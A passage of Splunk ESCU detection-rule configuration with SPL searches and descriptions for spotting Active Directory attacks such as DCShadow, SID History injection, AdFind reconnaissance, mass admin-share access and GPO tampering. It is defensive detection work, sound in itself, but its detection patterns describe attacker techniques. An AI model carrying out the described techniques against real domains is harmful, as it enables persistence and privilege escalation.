schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when either a global catalog SPN or a DRS RPC SPN are temporarily added to an Active Directory computer object, both of which can be evidence of a DCShadow attack. DCShadow allows an attacker who has obtained privileged access to register a rogue Domain Controller (DC). Once registered, the rogue DC may be able to inject and replicate changes into the AD infrastructure for any domain object, including credentials and keys. This technique was initially released in 2018 by security researchers Benjamin Delpy and Vincent Le Toux. No event logs are written for changes to AD attributes, allowing for stealthy backdoors to be implanted in the domain, or metadata such as timestamps overwritten to cover tracks. action.notable.param.rule_title = Windows AD Short Lived Domain Controller SPN Attribute action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5136 AttributeLDAPDisplayName=servicePrincipalName (AttributeValue="GC/*" OR AttributeValue="E3514235-4B06-11D1-AB04-00C04FC2DCD2/*") | stats min(_time) as _time range(_time) as duration values(OperationType) as OperationType values(user) as user values(src_ip) as src_ip values(src_nt_domain) as src_nt_domain values(src_user) as src_user values(Computer) as dest, values(ObjectDN) as ObjectDN by Logon_ID | eval short_lived=case((duration<30),"TRUE") | where short_lived="TRUE" AND mvcount(OperationType)>1 | replace "%%14674" with "Value Added", "%%14675" with "Value Deleted" in OperationType | rename Logon_ID as TargetLogonId | appendpipe [| map search="search `wineventlog_security` EventCode=4624 TargetLogonId=$TargetLogonId$"] | stats min(_time) as _time, values(ObjectDN) as ObjectDN values(OperationType) as OperationType by TargetLogonId src_user dest | `windows_ad_short_lived_domain_controller_spn_attribute_filter` [ESCU - Windows AD Short Lived Server Object - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a change in an Active Directory environment that could represent evidence of the DCShadow attack. DCShadow allows an attacker who has obtained privileged access to register a rogue Domain Controller (DC). Once registered, the rogue DC may be able to inject and replicate changes in the AD infrastructure for any domain object, including credentials and keys. This technique was initially released in 2018 by security researchers Benjamin Delpy and Vincent Le Toux. Specifically, the detection will trigger when a possible rogue Domain Controller computer object is created and quickly deleted within 30 seconds or less in an Active Directory domain. This behavior was identfied by simulating the DCShadow attack with Mimikatz. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1207"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a change in an Active Directory environment that could represent evidence of the DCShadow attack. DCShadow allows an attacker who has obtained privileged access to register a rogue Domain Controller (DC). Once registered, the rogue DC may be able to inject and replicate changes in the AD infrastructure for any domain object, including credentials and keys. This technique was initially released in 2018 by security researchers Benjamin Delpy and Vincent Le Toux. Specifically, the detection will trigger when a possible rogue Domain Controller computer object is created and quickly deleted within 30 seconds or less in an Active Directory domain. This behavior was identfied by simulating the DCShadow attack with Mimikatz. action.escu.how_to_implement = To successfully implement this search, you ned to be ingesting Event codes `5137` and `5141`. The Advanced Security Audit policy setting `Audit Directory Services Changes` within `DS Access` needs to be enabled. For these event codes to be generated, specific SACLs are required. action.escu.known_false_positives = Creating and deleting a server object within 30 seconds or less is unusual but not impossible in a production environment. Filter as needed. action.escu.creation_date = 2022-10-17 action.escu.modification_date = 2022-10-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Short Lived Server Object - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = Potential DCShadow Attack Detected on $Computer$ action.risk.param._risk = [{"risk_object_field": "SubjectUserName", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Short Lived Server Object - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1207"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a change in an Active Directory environment that could represent evidence of the DCShadow attack. DCShadow allows an attacker who has obtained privileged access to register a rogue Domain Controller (DC). Once registered, the rogue DC may be able to inject and replicate changes in the AD infrastructure for any domain object, including credentials and keys. This technique was initially released in 2018 by security researchers Benjamin Delpy and Vincent Le Toux. Specifically, the detection will trigger when a possible rogue Domain Controller computer object is created and quickly deleted within 30 seconds or less in an Active Directory domain. This behavior was identfied by simulating the DCShadow attack with Mimikatz. action.notable.param.rule_title = Windows AD Short Lived Server Object action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5137 OR EventCode=5141 ObjectDN="*CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration*" | transaction ObjectDN startswith=(EventCode=5137) endswith=(EventCode=5141) | eval short_lived=case((duration<30),"TRUE") | search short_lived = TRUE | stats values(ObjectDN) values(signature) values(EventCode) by _time, Computer, SubjectUserName | `windows_ad_short_lived_server_object_filter` [ESCU - Windows AD SID History Attribute Modified - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages event code `5136` to identify a modification of the SID History AD attribute. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries to stealthily grant access to a backdoor account within the same domain. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134", "T1134.005"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages event code `5136` to identify a modification of the SID History AD attribute. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries to stealthily grant access to a backdoor account within the same domain. action.escu.how_to_implement = To successfully implement this search, you ned to be ingesting eventcode `5136`. The Advanced Security Audit policy setting `Audit Directory Services Changes` within `DS Access` needs to be enabled. Additionally, a SACL needs to be created for AD objects in order to ingest attribute modifications. action.escu.known_false_positives = Domain mergers and migrations may generate large volumes of false positives for this analytic. action.escu.creation_date = 2022-11-16 action.escu.modification_date = 2022-11-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD SID History Attribute Modified - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = SID History AD attribute modified by $SubjectUserName$ for $ObjectDN$ action.risk.param._risk = [{"risk_object_field": "SubjectUserName", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD SID History Attribute Modified - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134", "T1134.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages event code `5136` to identify a modification of the SID History AD attribute. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries to stealthily grant access to a backdoor account within the same domain. action.notable.param.rule_title = Windows AD SID History Attribute Modified action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5136 AttributeLDAPDisplayName=sIDHistory OperationType="%%14674" | stats values(ObjectDN) by _time, Computer, SubjectUserName, AttributeValue | `windows_ad_sid_history_attribute_modified_filter` [ESCU - Windows AdFind Exe - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for the execution of `adfind.exe` with command-line arguments that it uses by default specifically the filter or search functions. It also considers the arguments necessary like objectcategory, see readme for more details: https://www.joeware.net/freetools/tools/adfind/usage.htm. AdFind.exe is a powerful tool that is commonly used for querying and retrieving information from Active Directory (AD). While it is primarily designed for AD administration and management, it has been seen used before by Wizard Spider, FIN6 and actors whom also launched SUNBURST. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for the execution of `adfind.exe` with command-line arguments that it uses by default specifically the filter or search functions. It also considers the arguments necessary like objectcategory, see readme for more details: https://www.joeware.net/freetools/tools/adfind/usage.htm. AdFind.exe is a powerful tool that is commonly used for querying and retrieving information from Active Directory (AD). While it is primarily designed for AD administration and management, it has been seen used before by Wizard Spider, FIN6 and actors whom also launched SUNBURST. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = ADfind is a command-line tool for AD administration and management that is seen to be leveraged by various adversaries. Filter out legitimate administrator usage using the filter macro. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AdFind Exe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Domain Trust Discovery", "IcedID", "NOBELIUM Group", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = Windows AdFind Exe action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AdFind Exe - Rule action.correlationsearch.annotations = {"analytic_story": ["Domain Trust Discovery", "IcedID", "NOBELIUM Group", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for the execution of `adfind.exe` with command-line arguments that it uses by default specifically the filter or search functions. It also considers the arguments necessary like objectcategory, see readme for more details: https://www.joeware.net/freetools/tools/adfind/usage.htm. AdFind.exe is a powerful tool that is commonly used for querying and retrieving information from Active Directory (AD). While it is primarily designed for AD administration and management, it has been seen used before by Wizard Spider, FIN6 and actors whom also launched SUNBURST. action.notable.param.rule_title = Windows AdFind Exe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="* -f *" OR Processes.process="* -b *") AND (Processes.process=*objectcategory* OR Processes.process="* -gcb *" OR Processes.process="* -sc *") by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_adfind_exe_filter` [ESCU - Windows Admin Permission Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is developed to identify suspicious file creation in the root drive (C:\). This tactic was observed in NjRAT as a means to ascertain whether its malware instance running on the compromised host possesses administrative privileges. The methodology involves an attempt to create a 'win.dat' file in the C:\ directory. If this file is successfully created, it serves as an indicator that the process indeed holds administrative privileges. This anomaly detection mechanism serves as a valuable pivot point for detecting NjRAT and other malware strains employing similar techniques to assess the privileges of their running malware instances, without using token privilege API calls or PowerShell commandlets. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is developed to identify suspicious file creation in the root drive (C:\). This tactic was observed in NjRAT as a means to ascertain whether its malware instance running on the compromised host possesses administrative privileges. The methodology involves an attempt to create a 'win.dat' file in the C:\ directory. If this file is successfully created, it serves as an indicator that the process indeed holds administrative privileges. This anomaly detection mechanism serves as a valuable pivot point for detecting NjRAT and other malware strains employing similar techniques to assess the privileges of their running malware instances, without using token privilege API calls or PowerShell commandlets. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the Filesystem responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Filesystem` node. action.escu.known_false_positives = False positives may occur if there are legitimate accounts with the privilege to drop files in the root of the C drive. It's recommended to verify the legitimacy of such actions and the accounts involved. action.escu.creation_date = 2023-09-19 action.escu.modification_date = 2023-09-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Admin Permission Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["NjRAT"] action.risk = 1 action.risk.param._risk_message = A file was created in root drive C:/ on host - $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Admin Permission Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["NjRAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = |tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*.exe", "*.dll", "*.sys", "*.com", "*.vbs", "*.vbe", "*.js", "*.bat", "*.cmd", "*.pif", "*.lnk", "*.dat") by Filesystem.dest Filesystem.file_create_time Filesystem.process_id Filesystem.process_guid Filesystem.file_name Filesystem.file_path Filesystem.user | `drop_dm_object_name(Filesystem)` | eval dropped_file_path = split(file_path, "\\") | eval dropped_file_path_split_count = mvcount(dropped_file_path) | eval root_drive = mvindex(dropped_file_path,0) | where LIKE(root_drive, "C:") AND dropped_file_path_split_count = 2 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_admin_permission_discovery_filter` [ESCU - Windows Administrative Shares Accessed On Multiple Hosts - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Event IDs 5140 or 5145 to identify a source computer accessing windows administrative shares (C$, Admin$ and IPC$ ) across a large number remote endpoints. Specifically, the logic will trigger when a source endpoint accesses administrative shares across 30 or more target computers within a 5 minute timespan. This behavior could represent an adversary who is enumerating network shares across an Active Directory environment in the search for sensitive files, a common technique leveraged by red teamers and threat actors. As environments differ across organizations, security teams should customize the thresholds of this detection as needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1135"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Event IDs 5140 or 5145 to identify a source computer accessing windows administrative shares (C$, Admin$ and IPC$ ) across a large number remote endpoints. Specifically, the logic will trigger when a source endpoint accesses administrative shares across 30 or more target computers within a 5 minute timespan. This behavior could represent an adversary who is enumerating network shares across an Active Directory environment in the search for sensitive files, a common technique leveraged by red teamers and threat actors. As environments differ across organizations, security teams should customize the thresholds of this detection as needed. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting file share events. The Advanced Security Audit policy setting `Audit Detailed File Share` or `Audit File Share` within `Object Access` need to be enabled. action.escu.known_false_positives = An single endpoint accessing windows administrative shares across a large number of endpoints is not common behavior. Possible false positive scenarios include but are not limited to vulnerability scanners, administration systems and missconfigured systems. action.escu.creation_date = 2023-03-23 action.escu.modification_date = 2023-03-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Administrative Shares Accessed On Multiple Hosts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Privilege Escalation", "Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = $IpAddress$ accessed the IPC share on more than 30 endpoints in a timespan of 5 minutes. action.risk.param._risk = [{"risk_object_field": "host_targets", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "IpAddress", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Administrative Shares Accessed On Multiple Hosts - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Privilege Escalation", "Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1135"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages Event IDs 5140 or 5145 to identify a source computer accessing windows administrative shares (C$, Admin$ and IPC$ ) across a large number remote endpoints. Specifically, the logic will trigger when a source endpoint accesses administrative shares across 30 or more target computers within a 5 minute timespan. This behavior could represent an adversary who is enumerating network shares across an Active Directory environment in the search for sensitive files, a common technique leveraged by red teamers and threat actors. As environments differ across organizations, security teams should customize the thresholds of this detection as needed. action.notable.param.rule_title = Windows Administrative Shares Accessed On Multiple Hosts action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5140 OR EventCode=5145 (ShareName="\\\\*\\ADMIN$" OR ShareName="\\\\*\\IPC$" OR ShareName="\\\\*\\C$") | bucket span=5m _time | stats dc(Computer) AS unique_targets values(Computer) as host_targets values(ShareName) as shares by _time, IpAddress, SubjectUserName, EventCode | where unique_targets > 30 | `windows_administrative_shares_accessed_on_multiple_hosts_filter` [ESCU - Windows Admon Default Group Policy Object Modified - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Splunks Admon to identify the modification of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the modification of the default GPOs. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Splunks Admon to identify the modification of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the modification of the default GPOs. action.escu.how_to_implement = To successfully implement this search, you need to be monitoring Active Directory logs using Admon. Details can be found here https://docs.splunk.com/Documentation/SplunkCloud/8.1.2101/Data/MonitorActiveDirectory action.escu.known_false_positives = The default Group Policy Objects within an AD network may be legitimately updated for administrative operations, filter as needed. action.escu.creation_date = 2023-03-29 action.escu.modification_date = 2023-03-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Admon Default Group Policy Object Modified - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = A default domain group policy was updated on $dcName$ action.risk.param._risk = [{"risk_object_field": "dcName", "risk_object_type": "system", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Admon Default Group Policy Object Modified - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages Splunks Admon to identify the modification of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the modification of the default GPOs. action.notable.param.rule_title = Windows Admon Default Group Policy Object Modified action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `admon` admonEventType=Update objectCategory="CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=*" (displayName="Default Domain Policy" OR displayName="Default Domain Controllers Policy") | stats min(_time) as firstTime max(_time) as lastTime values(gPCFileSysPath) by dcName, displayName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_admon_default_group_policy_object_modified_filter` [ESCU - Windows Admon Group Policy Object Created - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Splunks Admon to identify the creation of a new Group Policy Object. With GPOs, system administrators can manage and configure applications, software operations, and user settings throughout an entire organization. GPOs can be abused and leveraged by adversaries to escalate privileges or deploy malware across an Active Directory network. As an example, the Lockbit ransomware malware will create new group policies on the domain controller that are then pushed out to every device on the network. Security teams should monitor the creation of new Group Policy Objects. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Splunks Admon to identify the creation of a new Group Policy Object. With GPOs, system administrators can manage and configure applications, software operations, and user settings throughout an entire organization. GPOs can be abused and leveraged by adversaries to escalate privileges or deploy malware across an Active Directory network. As an example, the Lockbit ransomware malware will create new group policies on the domain controller that are then pushed out to every device on the network. Security teams should monitor the creation of new Group Policy Objects. action.escu.how_to_implement = To successfully implement this search, you need to be monitoring Active Directory logs using Admon. Details can be found here https://docs.splunk.com/Documentation/SplunkCloud/8.1.2101/Data/MonitorActiveDirectory action.escu.known_false_positives = Group Policy Objects are created as part of regular administrative operations, filter as needed. action.escu.creation_date = 2023-04-06 action.escu.modification_date = 2023-04-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Admon Group Policy Object Created - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = A new group policy objected was created on $dcName$ action.risk.param._risk = [{"risk_object_field": "dcName", "risk_object_type": "system", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Admon Group Policy Object Created - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages Splunks Admon to identify the creation of a new Group Policy Object. With GPOs, system administrators can manage and configure applications, software operations, and user settings throughout an entire organization. GPOs can be abused and leveraged by adversaries to escalate privileges or deploy malware across an Active Directory network. As an example, the Lockbit ransomware malware will create new group policies on the domain controller that are then pushed out to every device on the network. Security teams should monitor the creation of new Group Policy Objects. action.notable.param.rule_title = Windows Admon Group Policy Object Created action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `admon` admonEventType=Update objectCategory="CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=*" versionNumber=0 displayName!="New Group Policy Object" | stats min(_time) as firstTime max(_time) as lastTime values(gPCFileSysPath) by dcName, displayName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_admon_group_policy_object_created_filter` [ESCU - Windows Alternate DataStream - Base64 Content - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic leverages Sysmon Event ID 15, a critical file creation event, to detect the creation of Alternate Data Streams (ADS) on Windows systems. ADS is a feature of the NTFS file system that allows the storage of data in hidden streams attached to files. These streams are not visible in standard file listings, making them a popular technique for concealing malicious activity. Event ID 15 captures both the hash of the primary file content (unnamed stream) and the content of any additional named streams, which can include executables, scripts, or configuration data. Malware often exploits ADS to hide payloads, leveraging browser downloads to attach a Zone.Identifier stream, marking the file as originating from the Internet (Mark Of The Web, MOTW). This analytic is designed to identify such misuse by analyzing the content and creation patterns of named streams, including those under 1KB which may contain MOTW information. It is essential for detecting sophisticated threats that utilize non-executable file types or conceal malicious scripts within ADS, beyond the traditional focus on PE executables. The detection process involves monitoring for the creation of named streams, which are part of the NTFS structure and can be examined using tools like PowerShell for the presence of additional data streams or MOTW information. This approach helps in uncovering hidden payloads and tracking the origin of suspicious files downloaded via browsers or email clients, providing a comprehensive defense against ADS abuse. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564", "T1564.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic leverages Sysmon Event ID 15, a critical file creation event, to detect the creation of Alternate Data Streams (ADS) on Windows systems. ADS is a feature of the NTFS file system that allows the storage of data in hidden streams attached to files. These streams are not visible in standard file listings, making them a popular technique for concealing malicious activity. Event ID 15 captures both the hash of the primary file content (unnamed stream) and the content of any additional named streams, which can include executables, scripts, or configuration data. Malware often exploits ADS to hide payloads, leveraging browser downloads to attach a Zone.Identifier stream, marking the file as originating from the Internet (Mark Of The Web, MOTW). This analytic is designed to identify such misuse by analyzing the content and creation patterns of named streams, including those under 1KB which may contain MOTW information. It is essential for detecting sophisticated threats that utilize non-executable file types or conceal malicious scripts within ADS, beyond the traditional focus on PE executables. The detection process involves monitoring for the creation of named streams, which are part of the NTFS structure and can be examined using tools like PowerShell for the presence of additional data streams or MOTW information. This approach helps in uncovering hidden payloads and tracking the origin of suspicious files downloaded via browsers or email clients, providing a comprehensive defense against ADS abuse. action.escu.how_to_implement = Target environment must ingest sysmon data, specifically Event ID 15. action.escu.known_false_positives = Unknown action.escu.creation_date = 2024-02-15 action.escu.modification_date = 2024-02-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Alternate DataStream - Base64 Content - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Windows Defense Evasion Tactics"] action.risk = 1 action.risk.param._risk_message = Base64 content written to an NTFS alternate data stream by $user$, see command field for details. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 80}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m 